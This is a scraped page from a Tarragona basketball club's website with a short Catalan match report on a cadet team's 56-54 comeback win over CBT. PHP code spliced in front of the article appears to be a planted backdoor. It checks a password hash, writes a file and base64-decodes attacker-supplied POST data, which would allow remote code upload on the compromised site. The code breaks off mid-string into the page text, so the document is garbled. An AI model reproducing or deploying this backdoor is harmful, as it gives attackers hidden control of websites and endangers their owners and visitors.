function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet masculí de primer any remunta en la segona meitat i derrota el CBT (56-54) - Tgn Bàsquet Club -

El cadet masculí de primer any remunta en la segona meitat i derrota el CBT (56-54)

Updated: març 17, 2015

L’equip cadet masculí de primer any del TGN Bàsquet va fer una segona meitat molt bona que li va permetre capgirar la dinàmica del matx i imposar-se al CBT en el derbi tarragoní. L’equip local va fer un bon partit en defensa i va saber ser fort mentalment quan les coses anaven malament, una de les claus del triomf. El parcial de 7-18 dels visitants en el segon quart semblava que posava les coses molt difícils al TGN, però els locals van sortir molt forts en el tercer període i amb un parcial de 22-15 van arribar als minuts decisius del matx amb possibilitats de triomf que, finalment, es van endur.